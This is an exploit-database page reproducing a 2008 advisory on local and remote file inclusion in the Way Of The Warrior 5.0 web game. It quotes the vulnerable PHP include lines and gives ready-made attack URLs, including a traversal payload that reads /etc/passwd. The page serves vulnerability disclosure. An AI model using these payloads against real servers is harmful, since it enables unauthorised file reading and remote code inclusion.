Way Of The Warrior - exploit.company

vendor:

Way Of The Warrior

by:

dun

7.5

CVSS

HIGH

Local/Remote File Inclusion

CWE

Product Name: Way Of The Warrior

Affected Version From: 5

Affected Version To: 5

Patch Exists: NO

Related CWE: N/A

CPE: a:wotw:way_of_the_warrior

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Way Of The Warrior <= 5.0 Local/Remote File Inclusion Vulnerability

Way Of The Warrior is vulnerable to Local/Remote File Inclusion. The vulnerability is due to the 'plancia' parameter in 'visualizza.php' and 'crea.php' scripts not properly sanitized before being used to include files. This can be exploited to include arbitrary files from local resources and remote resources by passing an URL as a parameter.

Mitigation:

Input validation should be used to prevent the inclusion of files from external sources.

Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ##################################################################
 #  [ wotw <= 5.0 ]   Local/Remote File Inclusion Vulnerability   #
 ##################################################################
 # 
 # Script: "Way Of The Warrior is a web boardgame of fantasy battle..."
 #
 # Script site: http://wotw.altervista.org/
 # Download: http://sourceforge.net/project/platformdownload.php?group_id=178414
 #
 # [LFI] Vuln: http://site.com/wotw_5.0_en/visualizza.php?plancia=../../../../../../etc/passwd%00
 #      
 # Bug: ./wotw_5.0_en/visualizza.php (line: 17)
 #
 # ...
 # 	require_once("plance/".$_GET['plancia'].".php"); 	// LFI
 # ... 	 
 #
 #
 # [RFI] Vuln: http://site.com/wotw_5.0_en/crea.php?plancia=[spread?]
 #      
 # Bug: ./wotw_5.0_en/visualizza.php (lines: 12-19)
 #
 # ...
 # 	if(isset($_GET['plancia']))
 #   	{
 #    	require_once("configurazione/tipi.php");
 #    	require_once("unita/unita.php");
 #    	require_once("plance/plance.php");
 #    	require_once("giocatori/giocatori.php");
 #    	require_once("terreni/terreni.php");
 #    	require_once("".$_GET['plancia']); 			// RFI
 # ... 	 
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-11-04]